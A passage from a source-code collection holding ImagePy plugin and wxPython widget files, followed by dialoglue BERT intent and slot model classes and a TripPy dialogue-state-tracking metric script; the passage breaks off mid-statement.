dialog.Destroy()
return rst if para!=None else path
def get_para(title, view, para):
from .ui.panelconfig import ParaDialog
pd = ParaDialog(curapp, title)
pd.init_view(view, para)
rst = pd.ShowModal()
pd.Destroy()
return rst
def showtable(title, data, cols=None, rows=None):
from .ui.tablewindow import TableLog
TableLog.table(title, data, cols, rows)
# MT callafter(TableLog.table, *(title, data, cols, rows))
pub.subscribe(showtable, 'showtable')
def table(title, data, cols=None, rows=None):
wx.CallAfter(pub.sendMessage, "showtable", title=title, data=data, cols=cols, rows=rows)
def showlog(title, cont):
from .ui.logwindow import TextLog
TextLog.write(cont, title)
pub.subscribe(showlog, 'showlog')
def write(cont, title='ImagePy'):
from .ui.logwindow import TextLog
wx.CallAfter(pub.sendMessage, 'showlog', title=title, cont=cont)
def plot(title, gtitle='Graph', labelx='X-Unit', labely='Y-Unit'):
from .ui.plotwindow import PlotFrame
return PlotFrame.get_frame(title, gtitle, labelx, labely)
#def set_progress(i):
# curapp.set_progress(i)
# MT callafter(curapp.set_progress, i)
def set_info(i):
curapp.set_info(i)
# MT callafter(curapp.set_info, i)
def run(cmd):
title, para = cmd.split('>')
manager.PluginsManager.get(title)().start(eval(para), False)
```
#### File: menus/Analysis/label_plg.py
```python
import numpy as np
from scipy.ndimage import label, generate_binary_structure
from imagepy import IPy
from imagepy.core.engine import Filter
from imagepy.imageplus import ImagePlus
from imagepy.ui.canvasframe import CanvasFrame
class Plugin(Filter):
title = 'Label Image'
note = ['8-bit', 'not_slice', 'preview']
para = {'thr':128, 'con':'4-Connect'}
view = [('slide', (0,255), 'Threshold', 'thr', ''),
(list, ['4-Connect','8-Connect'], str, 'Structure', 'con', 'connect')]
def load(self, ips):
self.lut = ips.lut
ips.lut = self.lut.copy()
return True
def preview(self, para):
self.ips.lut[:] = self.lut
self.ips.lut[para['thr']:] = [255,0,0]
self.ips.update = 'pix'
def run(self, ips, snap, img, para = None):
if para == None: para = self.para
ips.lut = self.lut
msk = img>para['thr']
con = 1 if para['con']=='4-Connect' else 2
strc = generate_binary_structure(2, con)
msk = label(msk, strc, output = np.int16)
IPy.show_img([msk[0]], ips.title+'-label')
```
#### File: Help/Language/language_plgs.py
```python
from imagepy import IPy
from imagepy.core.manager import ColorManager, LanguageManager
from imagepy.core.engine import Free
class Plugin(Free):
def __init__(self, key):
self.title = key
asyn = False
#process
def run(self, para = None):
LanguageManager.set(self.title)
IPy.curapp.reload_plugins()
def __call__(self):
return self
plgs = [Plugin(i) for i in list(LanguageManager.langs.keys())]
plgs.insert(0, Plugin('English'))
plgs.append('-')
class NewLanguage(Free):
title = 'New Language'
para = {'name':'your language'}
view = [(str, 'name', 'name','')]
def run(self, para = None):
LanguageManager.newdic(para['name'])
LanguageManager.write()
class UpdateDictionary(Free):
title = 'Update Dictionary'
def run(self, para = None):
LanguageManager.add()
LanguageManager.write()
class CleanDictionary(Free):
title = 'Clean Dictionary'
def run(self, para = None):
LanguageManager.rm()
LanguageManager.write()
plgs.extend([NewLanguage, UpdateDictionary, CleanDictionary])
print(plgs)
if __name__ == '__main__':
print(list(ColorManager.luts.keys()))
```
#### File: Image/Type/convert_plg.py
```python
import numpy as np
from imagepy.core.engine import Simple
from imagepy import IPy
class To8bit(Simple):
title = '8-bit'
note = ['rgb']
def run(self, ips, imgs, para = None):
n = ips.get_nslices()
if ips.is3d:
img8 = np.zeros(ips.size+(n,), dtype=np.uint8)
for i in range(n):
self.progress(i, len(imgs))
img8[i] = imgs[i].mean(axis=2)
else:
img8 = []
for i in range(n):
self.progress(i, len(imgs))
img8.append(imgs[i].mean(axis=2).astype(np.uint8))
ips.set_imgs(img8)
class ToRGB(Simple):
title = 'RGB'
note = ['8-bit']
def run(self, ips, imgs, para = None):
n = ips.get_nslices()
if ips.is3d:
rgb = np.zeros(ips.size+(n,), dtype=np.uint8)
for i in range(n):
IPy.curapp.set_progress(round((i+1)*100.0/len(imgs)))
rgb[i] = ips.lut[imgs[i]]
else:
rgb = []
for i in range(n):
IPy.curapp.set_progress(round((i+1)*100.0/len(imgs)))
rgb.append(ips.lut[imgs[i]])
IPy.curapp.set_progress(0)
ips.set_imgs(rgb)
plgs = [To8bit, ToRGB]
```
#### File: Plugins/3D Viewer/surface3d_plg.py
```python
from imagepy.core.engine import Filter
from imagepy import IPy
from imagepy.core import myvi
import numpy as np
class Plugin(Filter):
modal = False
title = '3D Surface'
note = ['8-bit', 'not_slice', 'not_channel', 'preview']
para = {'name':'undifine', 'ds':2, 'thr':128, 'step':1, 'color':(0,255,0)}
view = [(str, 'Name', 'name',''),
('slide', (0,255), 'threshold', 'thr', ''),
(int, (1,20), 0, 'down scale', 'ds', 'pix'),
(int, (1,20), 0, 'march step', 'step', 'pix'),
('color', 'color', 'color', 'rgb')]
def load(self, ips):
if not ips.is3d:
IPy.alert('stack3d required!')
return False
self.frame = myvi.Frame3D.figure(IPy.curapp, title='3D Canvas')
self.buflut = ips.lut
ips.lut = ips.lut.copy()
return True
def preview(self, para):
self.ips.lut[:] = self.buflut
self.ips.lut[:para['thr']] = [255,0,0]
self.ips.update = 'pix'
def run(self, ips, snap, img, para = None):
imgs = ips.imgs
def cancel(self, ips):
ips.lut = self.buflut
ips.update = 'pix'
def run(self, ips, snap, img, para = None):
ips.lut = self.buflut
print('------------', para['color'])
cs = tuple([int(i/255.0) for i in para['color']])
vts, fs, ns, cs = myvi.build_surf3d(ips.imgs, para['ds'], para['thr'], para['step'], cs)
self.frame.viewer.add_surf_asyn(para['name'], vts, fs, ns, cs)
self.frame = None
'''
def run(self, ips, imgs, para = None):
from mayavi import mlab
volume = mlab.pipeline.scalar_field(ips.imgs)
if para['sigma']!=0:
volume = mlab.pipeline.user_defined(volume, filter='ImageGaussianSmooth')
volume.filter.standard_deviations = [para['sigma']]*3
c = tuple([i/255.0 for i in para['color']])
contour = mlab.pipeline.iso_surface(volume, contours=[para['thr']],
color=c, opacity=para['opa'])
mlab.show()
'''
if __name__ == '__main__':
pass
```
#### File: Plugins/Manager/console_plg.py
```python
import wx
from wx.py.shell import ShellFrame
import scipy.ndimage as ndimg
import numpy as np
from imagepy import IPy
from imagepy.core.engine import Free
from imagepy.core.manager import PluginsManager
## There is something wrong!
## To be fixed!
def get_ips():
ips = IPy.get_ips()
if ips is None:
print('no image opened!')
return ips
def update():
ips = IPy.get_ips()
if not ips is None :
ips.update='pix'
class Macros(dict):
def __init__(self):
for i in list(PluginsManager.plgs.keys()):
if not isinstance(i, str) or i == 'Command Line':
#print(PluginsManager.plgs[i])
continue
name = ''.join(list(filter(str.isalnum, i)))
### TODO:Fixme!
#exec('self.run_%s = lambda para=None,
# plg=PluginsManager.plgs[i]:plg().start(para)'%name)
#self['run_%s'%i] = lambda para=None, plg=PluginsManager.plgs[i]:plg().start(para)
exec('self.run_%s = lambda para=None, plg=PluginsManager.plgs[i]:plg().start(para)'%name)
#exec('self._%s = PluginsManager.plgs[i]().start'%name)
print(self)
cmds = {'IPy':IPy, 'ndimg':ndimg, 'update':update, 'curips':get_ips}
class Plugin(Free):
title = 'Command Line'
asyn = False
def load(self):
cmds['plgs'] = Macros()
return True
def run(self, para=None):
frame = ShellFrame(IPy.curapp, locals=cmds)
frame.shell.run('# numpy(np) and scipy.ndimage(ndimg) has been imported!\n')
frame.shell.run('# plgs.run_name() to call a ImagePy plugin.\n')
frame.shell.run('# IPy is avalible here, and curips() to get the current ImagePlus, update() to redraw.\n')
frame.Show(True)
```
#### File: menus/Plugins/update_plg.py
```python
from imagepy import IPy
from imagepy.core.engine import Free
class Update(Free):
title = 'Update Software'
def load(self):
try:
from dulwich.repo import Repo
from dulwich.client import get_transport_and_path
self.repo, self.trans = Repo, get_transport_and_path
except:
IPy.alert('dulwich is needed, you can use Plugins > Install > Install Packages:\ndulwich --global-option="--pure" to install')
return False
return True
def run(self, para=None):
IPy.set_info('update now, waiting...')
repo = self.repo('../')
client, remote_path = self.trans('https://github.com/Image-Py/imagepy.git')
a = client.fetch(remote_path, repo)
IPy.alert('imagepy update done!')
class Refresh(Free):
title = 'Reload Plugins'
def run(self, para=None):
IPy.curapp.reload_plugins()
plgs = [Update, Refresh]
```
#### File: menus/Process/calculator_plg.py
```python
from imagepy.core.manager import WindowsManager
from imagepy import IPy
from imagepy.core.engine import Simple
from imagepy.core.pixel import bliter
class Plugin(Simple):
"""Calculator Plugin derived from imagepy.core.engine.Simple """
title = 'Image Calculator'
note = ['all']
para = {'img1':'','op':'add','img2':''}
def load(self, ips):
titles = WindowsManager.get_titles()
self.para['img1'] = titles[0]
self.para['img2'] = titles[0]
Plugin.view = [(list, titles, str, 'image1', 'img1', ''),
(list, ['max', 'min', 'diff', 'add', 'substract'
], str, 'operator', 'op',''),
(list, titles, str, 'image2', 'img2', '')]
return True
def run(self, ips, imgs, para = None):
ips1 = WindowsManager.get(para['img1']).ips
ips2 = WindowsManager.get(para['img2']).ips
ips1.snapshot()
sl1, sl2 = ips1.get_nslices(), ips2.get_nslices()
cn1, cn2 = ips1.get_nchannels(), ips2.get_nchannels()
if ips1.dtype != ips2.dtype:
IPy.alert('Two stack must be equal dtype!')
return
elif sl1>1 and sl2>1 and sl1!=sl2:
IPy.alert('Two stack must have equal slices!')
return
elif cn1>1 and cn2>1 and cn1!=cn2:
IPy.alert('Two stack must have equal channels!')
return
w, h = ips1.size, ips2.size
w, h = min(w[0], h[0]), min(w[1], h[1])
if sl1 == 1:
bliter.blit(ips1.img, ips2.img, mode=para['op'])
elif sl1>1 and sl2==1:
for i in range(sl1):
self.progress(i, sl1)
bliter.blit(ips1.imgs[i], ips2.img, mode=para['op'])
elif sl1>1 and sl2>1:
for i in range(sl1):
self.progress(i, sl1)
bliter.blit(ips1.imgs[i], ips2.imgs[i], mode=para['op'])
ips1.update = 'pix'
```
#### File: imagepy/ui/widgets.py
```python
import wx
import numpy as np
class HistCanvas(wx.Panel):
""" HistCanvas: diverid from wx.core.Panel """
def __init__(self, parent ):
wx.Panel.__init__ ( self, parent, id = wx.ID_ANY,
pos = wx.DefaultPosition, size = wx.Size(256,81),
style = wx.TAB_TRAVERSAL )
self.init_buf()
self.his = None
self.update = False
self.x1, self.x2 = 0, 255
self.Bind(wx.EVT_SIZE, self.on_size)
self.Bind(wx.EVT_IDLE, self.on_idle)
self.Bind(wx.EVT_PAINT, self.on_paint)
def init_buf(self):
box = self.GetClientSize()
self.buffer = wx.Bitmap(box.width, box.height)
def on_size(self, event):
self.init_buf()
self.update = True
def on_idle(self, event):
if self.update == True:
self.draw()
self.update = False
def on_paint(self, event):
wx.BufferedPaintDC(self, self.buffer)
def set_hist(self, hist):
self.hist = (hist*80/hist.max()).astype(np.uint8)
self.update = True
def set_lim(self, x1, x2):
self.x1, self.x2 = x1, x2
self.update = True
def draw(self):
if self.hist is None:
return
# get client device context buffer
dc = wx.BufferedDC(wx.ClientDC(self), self.buffer)
dc.Clear()
# w, h = self.GetClientSize()
# the main draw process
print("drawing histogram")
dc.SetPen(wx.Pen((100,100,100), width=1, style=wx.SOLID))
for i in range(256):
dc.DrawLine(i,80,i,80-self.hist[i])
dc.SetPen(wx.Pen((0,0,0), width=1, style=wx.SOLID))
dc.DrawLine(self.x1, 80, self.x2, 0)
dc.DrawLines([(0,0),(255,0),(255,80),(0,80),(0,0)])
class NumCtrl(wx.TextCtrl):
"""NumCtrl: diverid from wx.core.TextCtrl """
def __init__(self, parent, rang, accury):
wx.TextCtrl.__init__(self, parent, wx.TE_RIGHT)
self.min, self.max = rang
self.accury = accury
wx.TextCtrl.Bind(self, wx.EVT_KEY_UP, self.ontext)
#! TODO: what is this?
def Bind(self, z, f):
self.f = f
def ontext(self, event):
self.f(event)
if self.GetValue()==None:
self.SetBackgroundColour((255,255,0))
else:
self.SetBackgroundColour((255,255,255))
def SetValue(self, n):
wx.TextCtrl.SetValue(self, str(round(n,self.accury) if self.accury>0 else int(n)))
def GetValue(self):
sval = wx.TextCtrl.GetValue(self)
try:
num = float(sval) if self.accury>0 else int(sval)
except ValueError:
return None
if num<self.min or num>self.max:
return None
if abs(round(num, self.accury) - num) > 1E-5:
return None
return num
class ColorCtrl(wx.TextCtrl):
"""ColorCtrl: deverid fron wx.coreTextCtrl"""
def __init__(self, parent):
wx.TextCtrl.__init__(self, parent, wx.TE_RIGHT)
wx.TextCtrl.Bind(self, wx.EVT_KEY_UP, self.ontext)
wx.TextCtrl.Bind(self, wx.EVT_LEFT_DOWN, self.oncolor)
def Bind(self, z, f):
self.f = f
def ontext(self, event):
print('ColorCtrl')
def oncolor(self, event):
rst = None
dlg = wx.ColourDialog(self)
dlg.GetColourData().SetChooseFull(True)
if dlg.ShowModal() == wx.ID_OK:
rst = dlg.GetColourData().GetColour()
self.SetBackgroundColour(rst)
self.SetValue(rst.GetAsString(wx.C2S_HTML_SYNTAX))
self.f(event)
dlg.Destroy()
def SetValue(self, color):
wx.TextCtrl.SetBackgroundColour(self, color)
des = self.GetBackgroundColour().GetAsString(wx.C2S_HTML_SYNTAX)
wx.TextCtrl.SetValue(self, des)
def GetValue(self):
return self.GetBackgroundColour().Get(False)
if __name__ == '__main__':
app = wx.PySimpleApp()
frame = wx.Frame(None)
hist = Histogram(frame)
frame.Fit()
frame.Show(True)
hist.set_hist(np.arange(256))
app.MainLoop()
``` |
{
"source": "jimpei8989/dialoglue",
"score": 2
} |
#### File: jimpei8989/dialoglue/bert_models.py
```python
import torch
import torch.nn.functional as F
from collections import defaultdict
from torch import nn
from torch.nn import CrossEntropyLoss, NLLLoss
from torch.nn import Dropout
from transformers import BertConfig, BertModel, BertForMaskedLM
from typing import Any
class BertPretrain(torch.nn.Module):
def __init__(self,
model_name_or_path: str):
super(BertPretrain, self).__init__()
self.bert_model = BertForMaskedLM.from_pretrained(model_name_or_path)
def forward(self,
input_ids: torch.tensor,
mlm_labels: torch.tensor):
outputs = self.bert_model(input_ids, masked_lm_labels=mlm_labels)
return outputs[0]
class IntentBertModel(torch.nn.Module):
def __init__(self,
model_name_or_path: str,
dropout: float,
num_intent_labels: int):
super(IntentBertModel, self).__init__()
self.bert_model = BertModel.from_pretrained(model_name_or_path)
self.dropout = Dropout(dropout)
self.num_intent_labels = num_intent_labels
self.intent_classifier = nn.Linear(self.bert_model.config.hidden_size, num_intent_labels)
def forward(self,
input_ids: torch.tensor,
attention_mask: torch.tensor,
token_type_ids: torch.tensor,
intent_label: torch.tensor = None):
pooled_output = self.bert_model(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)[1]
intent_logits = self.intent_classifier(self.dropout(pooled_output))
# Compute losses if labels provided
if intent_label is not None:
loss_fct = CrossEntropyLoss()
intent_loss = loss_fct(intent_logits.view(-1, self.num_intent_labels), intent_label.type(torch.long))
else:
intent_loss = torch.tensor(0)
return intent_logits, intent_loss
class SlotBertModel(torch.nn.Module):
def __init__(self,
model_name_or_path: str,
dropout: float,
num_slot_labels: int):
super(SlotBertModel, self).__init__()
self.bert_model = BertModel.from_pretrained(model_name_or_path)
self.dropout = Dropout(dropout)
self.num_slot_labels = num_slot_labels
self.slot_classifier = nn.Linear(self.bert_model.config.hidden_size, num_slot_labels)
def encode(self,
input_ids: torch.tensor,
attention_mask: torch.tensor,
token_type_ids: torch.tensor):
hidden_states, _ = self.bert_model(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)
return hidden_states
def forward(self,
input_ids: torch.tensor,
attention_mask: torch.tensor,
token_type_ids: torch.tensor,
slot_labels: torch.tensor = None):
hidden_states = self.encode(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)
slot_logits = self.slot_classifier(self.dropout(hidden_states))
# Compute losses if labels provided
if slot_labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = slot_logits.view(-1, self.num_slot_labels)[active_loss]
active_labels = slot_labels.view(-1)[active_loss]
slot_loss = loss_fct(active_logits, active_labels.type(torch.long))
else:
slot_loss = loss_fct(slot_logits.view(-1, self.num_slot_labels), slot_labels.view(-1).type(torch.long))
else:
slot_loss = torch.tensor(0).cuda() if torch.cuda.is_available() else torch.tensor(0)
return slot_logits, slot_loss
class JointSlotIntentBertModel(torch.nn.Module):
def __init__(self,
model_name_or_path: str,
dropout: float,
num_intent_labels: int,
num_slot_labels: int):
super(JointSlotIntentBertModel, self).__init__()
self.bert_model = BertModel.from_pretrained(model_name_or_path)
self.dropout = Dropout(dropout)
self.num_intent_labels = num_intent_labels
self.num_slot_labels = num_slot_labels
self.intent_classifier = nn.Linear(self.bert_model.config.hidden_size, num_intent_labels)
self.slot_classifier = nn.Linear(self.bert_model.config.hidden_size, num_slot_labels)
def forward(self,
input_ids: torch.tensor,
attention_mask: torch.tensor,
token_type_ids: torch.tensor,
intent_label: torch.tensor = None,
slot_labels: torch.tensor = None):
hidden_states, pooled_output = self.bert_model(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)
intent_logits = self.intent_classifier(self.dropout(pooled_output))
slot_logits = self.slot_classifier(self.dropout(hidden_states))
# Compute losses if labels provided
if slot_labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = slot_logits.view(-1, self.num_slot_labels)[active_loss]
active_labels = slot_labels.view(-1)[active_loss]
slot_loss = loss_fct(active_logits, active_labels.type(torch.long))
else:
slot_loss = loss_fct(slot_logits.view(-1, self.num_slot_labels), slot_labels.view(-1).type(torch.long))
else:
slot_loss = torch.tensor(0).cuda() if torch.cuda.is_available() else torch.tensor(0)
# Compute losses if labels provided
if intent_label is not None:
loss_fct = CrossEntropyLoss()
intent_loss = loss_fct(intent_logits.view(-1, self.num_intent_labels), intent_label.type(torch.long))
else:
intent_loss = torch.tensor(0)
return intent_logits, slot_logits, intent_loss + slot_loss
```
#### File: dialoglue/trippy/bert_models.py
```python
import torch
from transformers import BertForMaskedLM
class BertPretrain(torch.nn.Module):
def __init__(self, model_name_or_path: str):
super(BertPretrain, self).__init__()
self.bert_model = BertForMaskedLM.from_pretrained(model_name_or_path)
def forward(self, input_ids: torch.tensor, mlm_labels: torch.tensor):
outputs = self.bert_model(input_ids, masked_lm_labels=mlm_labels)
return outputs[0]
```
#### File: dialoglue/trippy/metric_bert_dst.py
```python
import glob
import json
import sys
import numpy as np
import re
def load_dataset_config(dataset_config):
with open(dataset_config, "r", encoding="utf-8") as f:
raw_config = json.load(f)
return raw_config["class_types"], raw_config["slots"], raw_config["label_maps"]
def tokenize(text):
if "\u0120" in text:
text = re.sub(" ", "", text)
text = re.sub("\u0120", " ", text)
text = text.strip()
return " ".join([tok for tok in map(str.strip, re.split("(\W+)", text)) if len(tok) > 0])
def is_in_list(tok, value):
found = False
tok_list = [item for item in map(str.strip, re.split("(\W+)", tok)) if len(item) > 0]
value_list = [item for item in map(str.strip, re.split("(\W+)", value)) if len(item) > 0]
tok_len = len(tok_list)
value_len = len(value_list)
for i in range(tok_len + 1 - value_len):
if tok_list[i : i + value_len] == value_list:
found = True
break
return found
def check_slot_inform(value_label, inform_label, label_maps):
value = inform_label
if value_label == inform_label:
value = value_label
elif is_in_list(inform_label, value_label):
value = value_label
elif is_in_list(value_label, inform_label):
value = value_label
elif inform_label in label_maps:
for inform_label_variant in label_maps[inform_label]:
if value_label == inform_label_variant:
value = value_label
break
elif is_in_list(inform_label_variant, value_label):
value = value_label
break
elif is_in_list(value_label, inform_label_variant):
value = value_label
break
elif value_label in label_maps:
for value_label_variant in label_maps[value_label]:
if value_label_variant == inform_label:
value = value_label
break
elif is_in_list(inform_label, value_label_variant):
value = value_label
break
elif is_in_list(value_label_variant, inform_label):
value = value_label
break
return value
def get_joint_slot_correctness(
fp,
class_types,
label_maps,
key_class_label_id="class_label_id",
key_class_prediction="class_prediction",
key_start_pos="start_pos",
key_start_prediction="start_prediction",
key_end_pos="end_pos",
key_end_prediction="end_prediction",
key_refer_id="refer_id",
key_refer_prediction="refer_prediction",
key_slot_groundtruth="slot_groundtruth",
key_slot_prediction="slot_prediction",
):
with open(fp) as f:
preds = json.load(f)
class_correctness = [[] for cl in range(len(class_types) + 1)]
confusion_matrix = [
[[] for cl_b in range(len(class_types))] for cl_a in range(len(class_types))
]
pos_correctness = []
refer_correctness = []
val_correctness = []
total_correctness = []
c_tp = {ct: 0 for ct in range(len(class_types))}
c_tn = {ct: 0 for ct in range(len(class_types))}
c_fp = {ct: 0 for ct in range(len(class_types))}
c_fn = {ct: 0 for ct in range(len(class_types))}
for pred in preds:
guid = pred["guid"] # List: set_type, dialogue_idx, turn_idx
turn_gt_class = pred[key_class_label_id]
turn_pd_class = pred[key_class_prediction]
gt_start_pos = pred[key_start_pos]
pd_start_pos = pred[key_start_prediction]
gt_end_pos = pred[key_end_pos]
pd_end_pos = pred[key_end_prediction]
gt_refer = pred[key_refer_id]
pd_refer = pred[key_refer_prediction]
gt_slot = pred[key_slot_groundtruth]
pd_slot = pred[key_slot_prediction]
gt_slot = tokenize(gt_slot)
pd_slot = tokenize(pd_slot)
# Make sure the true turn labels are contained in the prediction json file!
joint_gt_slot = gt_slot
if guid[-1] == "0": # First turn, reset the slots
joint_pd_slot = "none"
# If turn_pd_class or a value to be copied is "none", do not update the dialog state.
if turn_pd_class == class_types.index("none"):
pass
elif turn_pd_class == class_types.index("dontcare"):
joint_pd_slot = "dontcare"
elif turn_pd_class == class_types.index("copy_value"):
joint_pd_slot = pd_slot
elif "true" in class_types and turn_pd_class == class_types.index("true"):
joint_pd_slot = "true"
elif "false" in class_types and turn_pd_class == class_types.index("false"):
joint_pd_slot = "false"
elif "refer" in class_types and turn_pd_class == class_types.index("refer"):
if pd_slot[0:3] == "§§ ":
if pd_slot[3:] != "none":
joint_pd_slot = check_slot_inform(joint_gt_slot, pd_slot[3:], label_maps)
elif pd_slot[0:2] == "§§":
if pd_slot[2:] != "none":
joint_pd_slot = check_slot_inform(joint_gt_slot, pd_slot[2:], label_maps)
elif pd_slot != "none":
joint_pd_slot = pd_slot
elif "inform" in class_types and turn_pd_class == class_types.index("inform"):
if pd_slot[0:3] == "§§ ":
if pd_slot[3:] != "none":
joint_pd_slot = check_slot_inform(joint_gt_slot, pd_slot[3:], label_maps)
elif pd_slot[0:2] == "§§":
if pd_slot[2:] != "none":
joint_pd_slot = check_slot_inform(joint_gt_slot, pd_slot[2:], label_maps)
else:
print("ERROR: Unexpected slot value format. Aborting.")
exit()
else:
print("ERROR: Unexpected class_type. Aborting.")
exit()
total_correct = True
# Check the per turn correctness of the class_type prediction
if turn_gt_class == turn_pd_class:
class_correctness[turn_gt_class].append(1.0)
class_correctness[-1].append(1.0)
c_tp[turn_gt_class] += 1
for cc in range(len(class_types)):
if cc != turn_gt_class:
c_tn[cc] += 1
# Only where there is a span, we check its per turn correctness
if turn_gt_class == class_types.index("copy_value"):
if gt_start_pos == pd_start_pos and gt_end_pos == pd_end_pos:
pos_correctness.append(1.0)
else:
pos_correctness.append(0.0)
# Only where there is a referral, we check its per turn correctness
if "refer" in class_types and turn_gt_class == class_types.index("refer"):
if gt_refer == pd_refer:
refer_correctness.append(1.0)
print(" [%s] Correct referral: %s | %s" % (guid, gt_refer, pd_refer))
else:
refer_correctness.append(0.0)
print(" [%s] Incorrect referral: %s | %s" % (guid, gt_refer, pd_refer))
else:
if turn_gt_class == class_types.index("copy_value"):
pos_correctness.append(0.0)
if "refer" in class_types and turn_gt_class == class_types.index("refer"):
refer_correctness.append(0.0)
class_correctness[turn_gt_class].append(0.0)
class_correctness[-1].append(0.0)
confusion_matrix[turn_gt_class][turn_pd_class].append(1.0)
c_fn[turn_gt_class] += 1
c_fp[turn_pd_class] += 1
# Check the joint slot correctness.
# If the value label is not none, then we need to have a value prediction.
# Even if the class_type is 'none', there can still be a value label,
# it might just not be pointable in the current turn. It might however
# be referrable and thus predicted correctly.
if joint_gt_slot == joint_pd_slot:
val_correctness.append(1.0)
elif (
joint_gt_slot != "none"
and joint_gt_slot != "dontcare"
and joint_gt_slot != "true"
and joint_gt_slot != "false"
and joint_gt_slot in label_maps
):
no_match = True
for variant in label_maps[joint_gt_slot]:
if variant == joint_pd_slot:
no_match = False
break
if no_match:
val_correctness.append(0.0)
total_correct = False
print(
" [%s] Incorrect value (variant): %s (turn class: %s) | %s (turn class: %s)"
% (guid, joint_gt_slot, turn_gt_class, joint_pd_slot, turn_pd_class)
)
else:
val_correctness.append(1.0)
else:
val_correctness.append(0.0)
total_correct = False
print(
" [%s] Incorrect value: %s (turn class: %s) | %s (turn class: %s)"
% (guid, joint_gt_slot, turn_gt_class, joint_pd_slot, turn_pd_class)
)
total_correctness.append(1.0 if total_correct else 0.0)
# Account for empty lists (due to no instances of spans or referrals being seen)
if pos_correctness == []:
pos_correctness.append(1.0)
if refer_correctness == []:
refer_correctness.append(1.0)
for ct in range(len(class_types)):
if c_tp[ct] + c_fp[ct] > 0:
precision = c_tp[ct] / (c_tp[ct] + c_fp[ct])
else:
precision = 1.0
if c_tp[ct] + c_fn[ct] > 0:
recall = c_tp[ct] / (c_tp[ct] + c_fn[ct])
else:
recall = 1.0
if precision + recall > 0:
f1 = 2 * ((precision * recall) / (precision + recall))
else:
f1 = 1.0
if c_tp[ct] + c_tn[ct] + c_fp[ct] + c_fn[ct] > 0:
acc = (c_tp[ct] + c_tn[ct]) / (c_tp[ct] + c_tn[ct] + c_fp[ct] + c_fn[ct])
else:
acc = 1.0
print(
"Performance for class '%s' (%s): Recall: %.2f (%d of %d), Precision: %.2f, F1: %.2f, Accuracy: %.2f (TP/TN/FP/FN: %d/%d/%d/%d)"
% (
class_types[ct],
ct,
recall,
np.sum(class_correctness[ct]),
len(class_correctness[ct]),
precision,
f1,
acc,
c_tp[ct],
c_tn[ct],
c_fp[ct],
c_fn[ct],
)
)
print("Confusion matrix:")
for cl in range(len(class_types)):
print(" %s" % (cl), end="")
print("")
for cl_a in range(len(class_types)):
print("%s " % (cl_a), end="")
for cl_b in range(len(class_types)):
if len(class_correctness[cl_a]) > 0:
print(
"%.2f "
% (np.sum(confusion_matrix[cl_a][cl_b]) / len(class_correctness[cl_a])),
end="",
)
else:
print("---- ", end="")
print("")
return (
np.asarray(total_correctness),
np.asarray(val_correctness),
np.asarray(class_correctness),
np.asarray(pos_correctness),
np.asarray(refer_correctness),
np.asarray(confusion_matrix),
c_tp,
c_tn,
c_fp,
c_fn,
)
if __name__ == "__main__":
acc_list = []
acc_list_v = []
key_class_label_id = "class_label_id_%s"
key_class_prediction = "class_prediction_%s"
key_start_pos = "start_pos_%s"
key_start_prediction = "start_prediction_%s"
key_end_pos = "end_pos_%s"
key_end_prediction = "end_prediction_%s"
key_refer_id = "refer_id_%s"
key_refer_prediction = "refer_prediction_%s"
key_slot_groundtruth = "slot_groundtruth_%s"
key_slot_prediction = "slot_prediction_%s"
dataset = sys.argv[1].lower()
dataset_config = sys.argv[2].lower()
if dataset not in ["woz2", "sim-m", "sim-r", "multiwoz21"]:
raise ValueError("Task not found: %s" % (dataset))
class_types, slots, label_maps = load_dataset_config(dataset_config)
# Prepare label_maps
label_maps_tmp = {}
for v in label_maps:
label_maps_tmp[tokenize(v)] = [tokenize(nv) for nv in label_maps[v]]
label_maps = label_maps_tmp
for fp in sorted(glob.glob(sys.argv[3])):
print(fp)
goal_correctness = 1.0
cls_acc = [[] for cl in range(len(class_types))]
cls_conf = [[[] for cl_b in range(len(class_types))] for cl_a in range(len(class_types))]
c_tp = {ct: 0 for ct in range(len(class_types))}
c_tn = {ct: 0 for ct in range(len(class_types))}
c_fp = {ct: 0 for ct in range(len(class_types))}
c_fn = {ct: 0 for ct in range(len(class_types))}
for slot in slots:
(
tot_cor,
joint_val_cor,
cls_cor,
pos_cor,
ref_cor,
conf_mat,
ctp,
ctn,
cfp,
cfn,
) = get_joint_slot_correctness(
fp,
class_types,
label_maps,
key_class_label_id=(key_class_label_id % slot),
key_class_prediction=(key_class_prediction % slot),
key_start_pos=(key_start_pos % slot),
key_start_prediction=(key_start_prediction % slot),
key_end_pos=(key_end_pos % slot),
key_end_prediction=(key_end_prediction % slot),
key_refer_id=(key_refer_id % slot),
key_refer_prediction=(key_refer_prediction % slot),
key_slot_groundtruth=(key_slot_groundtruth % slot),
key_slot_prediction=(key_slot_prediction % slot),
)
print(
"%s: joint slot acc: %g, joint value acc: %g, turn class acc: %g, turn position acc: %g, turn referral acc: %g"
% (
slot,
np.mean(tot_cor),
np.mean(joint_val_cor),
np.mean(cls_cor[-1]),
np.mean(pos_cor),
np.mean(ref_cor),
)
)
goal_correctness *= tot_cor
for cl_a in range(len(class_types)):
cls_acc[cl_a] += cls_cor[cl_a]
for cl_b in range(len(class_types)):
cls_conf[cl_a][cl_b] += list(conf_mat[cl_a][cl_b])
c_tp[cl_a] += ctp[cl_a]
c_tn[cl_a] += ctn[cl_a]
c_fp[cl_a] += cfp[cl_a]
c_fn[cl_a] += cfn[cl_a]
for ct in range(len(class_types)):
if c_tp[ct] + c_fp[ct] > 0:
precision = c_tp[ct] / (c_tp[ct] + c_fp[ct])
else:
precision = 1.0
if c_tp[ct] + c_fn[ct] > 0:
recall = c_tp[ct] / (c_tp[ct] + c_fn[ct])
else:
recall = 1.0
if precision + recall > 0:
f1 = 2 * ((precision * recall) / (precision + recall))
else:
f1 = 1.0
if c_tp[ct] + c_tn[ct] + c_fp[ct] + c_fn[ct] > 0:
acc = (c_tp[ct] + c_tn[ct]) / (c_tp[ct] + c_tn[ct] + c_fp[ct] + c_fn[ct])
else:
acc = 1.0
print(
"Performance for class '%s' (%s): Recall: %.2f (%d of %d), Precision: %.2f, F1: %.2f, Accuracy: %.2f (TP/TN/FP/FN: %d/%d/%d/%d)"
